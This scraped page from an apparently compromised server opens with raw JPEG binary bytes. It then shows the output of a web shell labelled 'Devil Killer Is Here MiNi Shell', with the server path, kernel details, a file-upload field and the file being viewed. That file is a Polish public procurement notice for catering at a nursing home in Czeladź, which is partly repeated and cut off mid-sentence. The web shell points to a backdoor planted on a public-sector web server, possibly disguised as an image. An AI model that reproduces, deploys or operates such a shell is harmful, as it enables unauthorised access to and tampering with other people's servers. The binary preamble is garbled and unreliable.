JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231129/0052153101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa gastronomiczna w DPS „SENIOR” im. Jana Kaczmarka w Czeladzi w okresie od 01.01.2024 do 31.05.2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej SENIOR im. Jana Kaczmarka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 242630274</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 5A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czeladź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-250</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 265 94 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 265 94 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">senior@senior.czeladz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.senior.czeladz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa gastronomiczna w DPS „SENIOR” im. Jana Kaczmarka w Czeladzi w okresie od 01.01.2024 do 31.05.2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7b2ce8e5-8ea6-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00521531</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016593/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługa gastronomiczna (gotowanie i przygotowanie posiłków)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://senior-czeladz.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://senior-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://senior-czeladz.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://senior-czeladz.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Państwa danych osobowych jest Dom Pomocy Społecznej „SENIOR” im. Jana Kaczmarka w Czeladzi z siedzibą w Czeladzi przy ul. Szpitalnej 5A, nr tel. sekretariat: 32/265-94-00, email: senior@senior.czeladz.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/3/U/DPS/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 465000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Usługa gastronomiczna w Domu Pomocy Społecznej „SENIOR” im. Jana Kaczmarka w Czeladzi” w okresie od 01.01.2024 r. do 31.05.2024 r.”<br/>co oznacza:<br/><br/>3.1. przygotowywanie i wydawanie posiłków we wszystkie dni roku kalendarzowego w ilościach:<br/> - śniadanie, obiad ( dwa zestawy ) i kolacja dla maksymalnie 48 mieszkańców <br/> Domu Pomocy Społecznej „SENIOR” im. Jana Kaczmarka w Czeladzi,<br/>3.2. dokonywanie z własnych środków finansowych zakupu produktów potrzebnych do sporządzania posiłków (śniadanie, obiad, kolacja),<br/>3.3. dostawę i magazynowanie produktów potrzebnych do sporządzania posiłków, w magazynach oddanych Wykonawcy w używanie przez Zamawiającego.<br/>3.4. przygotowywanie posiłków ściśle wg załączonego jadłospisu (załączniki nr od 1a do 1d do wzoru umowy); <br/>3.5. sporządzanie posiłków, co do ilości, zgodnie z otrzymanym zapotrzebowaniem przekazanym przez pracownika socjalnego z uwzględnieniem ewentualnych diet.<br/> Zamawiający zobowiązuje się do codziennego podawania liczby zamawianych posiłków do <br/> godz. 1000 na dzień następny (w przypadku występujących niedziel i Świąt także na <br/> niedziele i Święta) z uwzględnieniem ewentualnych diet. <br/>3.6. zamawiający zastrzega sobie możliwość zapotrzebowania na posiłki dla chorych mieszkańców zgodnie z zaleceniem lekarza (diet) w miejsce posiłków wynikających z jadłospisu przewidzianego na dany dzień kalendarzowy, przy czym łączna ilość przygotowywanych posiłków nie ulegnie zmianie. Posiłki te powinny być oparte na nomenklaturze diet obowiązujących przy żywieniu różnych jednostek chorobowych. Zamawiajacy zastrzega sobie prawo wglądu do dokumentacji źródłowej dotyczącej ustalania posiłków wynikających z zastosowania diet zleconych przez lekarza.<br/>3.7. używanie do sporządzania posiłków artykułów spożywczych z ważnym terminem <br/> przydatności do spożycia,<br/> 3.8. posiłki winny być przygotowane na miejscu, z produktów świeżych i nieprzetworzonych; nie <br/> dopuszcza się używania półproduktów, produktów gotowych oraz podawania posiłków <br/> odgrzewanych.<br/> 3.9. Wykonawca zapewni w czasie trwania posiłków przyprawy, tj. sól, pieprz czarny mielony, <br/> przyprawę do zup w płynie, ocet, <br/> 3.10. obiad winien składać się z dwóch dań tj. zupy i drugiego dania przygotowanych w dwóch zestawach do wyboru mieszkańca oraz ciepłego napoju (np. kompot, herbata). Konsystencja posiłków winna być dostosowana do możliwości konsumpcyjnych danego mieszkańca (posiłki mielone, miksowane – na każde żądanie opiekuna), przygotowane z wymienionych zestawów obiadowych określonych w jadłospisach 1a-1d.<br/> 3.11. przygotowanie potraw świątecznych zgodnie z tradycją , w ramach tzw. „wsadu do kotła”,<br/> 3.12. chleb nie może być wydzielany, winien być dostępny bez ograniczeń do wszystkich posiłków,<br/> 3.13. przez całą dobę, do dyspozycji mieszkańców, winna być: herbata, masło, dżem, pasztet drobiowy i chleb, w miejscu wskazanym przez Zamawiającego.<br/> Zamawiający podaje poniżej ilość ww. produktów podczas trwania umowy:<br/>1. Herbata - 15,2 kg (100 g/dobę)<br/>2. Masło - 15,2 kg (100 g/dobę)<br/>3. Dżem - 152 słoiki po 280 g (1 słoik/dobę)<br/>4. Pasztet drobiowy	- 152 puszki po 160 g (1 puszka/dobę)<br/>5. Chleb - 76,0 kg (500 g/dobę)<br/> 3.14. wydawanie posiłków we wszystkie dni roku kalendarzowego w następujących godzinach:<br/> - śniadanie - w godz. 800-1000<br/>- obiad - w godz. 1300-1500<br/> - kolacja - w godz. 1800-2000 <br/> 3.15. rozliczanie się z Zamawiającym w systemie miesięcznym wg załączonego wzoru (załącznik nr 2 do wzoru umowy )<br/> 3.16. utrzymywanie porządku w pomieszczeniach jadalni, kuchni, zaplecza i magazynów środkami czystości posiadającymi atesty, zakupionymi z własnych środków finansowych,<br/> 3.17. zapewnienie własnych estetycznych obrusów na stoły w jadalni,<br/> 3.18. pranie i prasowanie obrusów, zasłon i firan z jadalni, mycie okien, podłogi,<br/> 3.19. w przypadku awarii powierzonego sprzętu z winy Wykonawcy – pokrywanie kosztów naprawy niezależnie od ich wysokości, a gdyby w wymienionej sytuacji (z winy Wykonawcy) sprzęt nie nadawał się do dalszej eksploatacji, odkupienie na własny koszt takiego samego sprzętu lub sprzętu podobnej klasy w terminie 30 dni od daty stwierdzenia nieprzydatności sprzętu,<br/> 3.20. przestrzeganie zasad higieny w pomieszczeniach oddanych w używanie oraz zasad BHP, P.poż. i SANEPIDU,<br/> 3.21. prowadzenie na własny koszt monitoringu DDD,<br/> 3.22. dokonywanie na własny koszt dezynsekcji we wszystkich pomieszczeniach przekazanych w używanie w zależności od potrzeby.<br/> 3.23. dokonywania na własny koszt :<br/> - naprawy kranów, kratek wentylacyjnych i ściekowych,<br/> - wymiany żarówek,<br/> - wymiany jarzeniówek,<br/> - naprawy spłuczki WC,<br/> - czyszczenie odstojników,<br/> - czyszczenie odpływów w zlewozmywakach,<br/> - uzupełnianie płynów stosowanych w zmywarce zgodnie z zaleceniami producenta,<br/> - naprawy różnego rodzaju wyłączników<br/> w pomieszczeniach i sprzęcie przekazanym w użytkowanie. Naprawy i usunięcie <br/> usterek nie wymienionych powyżej obciążają Zamawiającego.<br/> 3.24. strony ustalają, że inwentaryzacja pomieszczeń i przekazanego w używanie sprzętu i drobnego wyposażenia będzie dokonywana zgodnie z obowiązującymi przepisami prawa. Inwentaryzację zarządza Zamawiający, a Wykonawca zobowiązany jest do przygotowania inwentaryzowanych składników zgodnie z obowiązującymi przepisami prawa.<br/> 3.25. masło używane do posiłków powinno mieć zawartość tłuszczu mlecznego minimum 82%.<br/> Uwaga: Zamawiający zastrzega sobie prawo zmniejszenia ilości posiłków, w zależności <br/> od ilości mieszkańców przebywających w DPS. <br/><br/><br/>W zakresie wymogów jakościowych odnoszących się do przedmiotu zamówienia Zamawiający wymaga, aby do realizacji przedmiotu zamówienia zostały skierowane minimum 2 osoby posiadające doświadczenie w gotowaniu i przygotowywaniu posiłków powyżej 5 lat. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55322000-3 - Usługi gotowania posiłków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/>Spełnienie warunków udziału w postępowaniu:<br/>5.1. zdolności do występowania w obrocie gospodarczym: <br/>- Zamawiający nie określa warunku w niniejszym zakresie.<br/><br/>5.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>- Zamawiający nie określa warunku w niniejszym zakresie.<br/><br/> 5.3. sytuacji ekonomicznej lub finansowej<br/>	Wykonawca spełni warunek w sytuacji kiedy wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną nie mniejsza niż 300 000 PLN.<br/>	Zamawiający spełnienie warunku oceni na podstawie oświadczenia o spełnianiu warunków w trybie art.125 ust. 1 Ustawy Pzp, oraz Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełnienia warunku udziału w postępowaniu, zostanie wezwany w wyznaczonym , nie krótszym niż 5 dni terminie do przedłożenia dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określona powyżej przez Zamawiającego.<br/><br/>5.4. zdolności technicznej lub zawodowej;<br/> - wykaz usług, niezbędnych do wykazania spełniania warunku posiadania wiedzy i doświadczenia, wykonanych lub wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z dowodami, iż te usługi zostały wykonane lub są wykonywane należycie. <br/> Zamawiający spełnienie warunku oceni na podstawie oświadczenia o spełnianiu warunków w trybie art.125 ust. 1 Ustawy Pzp oraz Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełnienia warunku udziału w postępowaniu, zostanie wezwany w wyznaczonym , nie krótszym niż 5 dni terminie do przedłożenia dokumentu potwierdzającego że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje co najmniej 1 usługę gotowania i przygotowania posiłków w domu pomocy społecznej lub całodobowym ośrodku wsparcia o wartości brutto nie mniejszej niż 300.000,00 zł;<br/>	- skieruje do realizacji przedmiotu zamówienia minimum 2 osoby posiadające doświadczenie w usłudze gotowania i przygotowywania posiłków powyżej 5 lat.<br/>	Zamawiający spełnienie warunku oceni na podstawie oświadczenia o spełnianiu warunków w trybie art.125 ust. 1 Ustawy Pzp <br/><br/><br/>Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt. 5.1. – 5.4. winien spełniać jeden Wykonawca, lub wszyscy Wykonawcy wspólnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający spełnienie warunku oceni na podstawie oświadczenia o spełnianiu warunków w trybie art.125 ust. 1 Ustawy Pzp,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający spełnienie warunku oceni na podstawie oświadczenia o spełnianiu warunków w trybie art.125 ust. 1 Ustawy Pzp,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Spełnienie warunków udziału w postępowaniu:<br/>5.1. zdolności do występowania w obrocie gospodarczym: <br/>- Zamawiający nie określa warunku w niniejszym zakresie.<br/><br/>5.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>- Zamawiający nie określa warunku w niniejszym zakresie.<br/><br/> 5.3. sytuacji ekonomicznej lub finansowej<br/>	Wykonawca spełni warunek w sytuacji kiedy wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną nie mniejsza niż 300 000 PLN.<br/>	Zamawiający spełnienie warunku oceni na podstawie oświadczenia o spełnianiu warunków w trybie art.125 ust. 1 Ustawy Pzp, oraz Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełnienia warunku udziału w postępowaniu, zostanie wezwany w wyznaczonym , nie krótszym niż 5 dni terminie do przedłożenia dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określona powyżej przez Zamawiającego.<br/><br/>5.4. zdolności technicznej lub zawodowej;<br/> - wykaz usług, niezbędnych do wykazania spełniania warunku posiadania wiedzy i doświadczenia, wykonanych lub wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z dowodami, iż te usługi zostały wykonane lub są wykonywane należycie. <br/> Zamawiający spełnienie warunku oceni na podstawie oświadczenia o spełnianiu warunków w trybie art.125 ust. 1 Ustawy Pzp oraz Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełnienia warunku udziału w postępowaniu, zostanie wezwany w wyznaczonym , nie krótszym niż 5 dni terminie do przedłożenia dokumentu potwierdzającego że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje co najmniej 1 usługę gotowania i przygotowania posiłków w domu pomocy społecznej lub całodobowym ośrodku wsparcia o wartości brutto nie mniejszej niż 300.000,00 zł;<br/>	- skieruje do realizacji przedmiotu zamówienia minimum 2 osoby posiadające doświadczenie w usłudze gotowania i przygotowywania posiłków powyżej 5 lat.<br/>	Zamawiający spełnienie warunku oceni na podstawie oświadczenia o spełnianiu warunków w trybie art.125 ust. 1 Ustawy Pzp <br/><br/><br/>Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt. 5.1. – 5.4. winien spełniać jeden Wykonawca, lub wszyscy Wykonawcy wspólnie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W celu potwierdzenia spełnienia warunków udziału w postępowaniu do oferty należy załączyć:<br/><br/> 1. oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w pkt. 5.3 i 5.4 SWZ wg wzoru na zał. nr 3 do SWZ (oświadczenie wstępne); <br/> 2. oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z postępowania wg wzoru na zał. nr 4 do SWZ (oświadczenie wstępne); <br/> 3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy ubiegającego się lub Wykonawców ubiegających się wspólnie, o udzielenie zamówienia publicznego albo reprezentowanie w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/> 4. Zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji, o ile Wykonawca korzysta ze zdolności innych podmiotów na zasadach określonych w art. 118 ust. 1 ustawy Pzp wg wzoru na zał. nr 5 do SWZ<br/> <br/> Uwagi: <br/>W przypadku oferty składanej przez 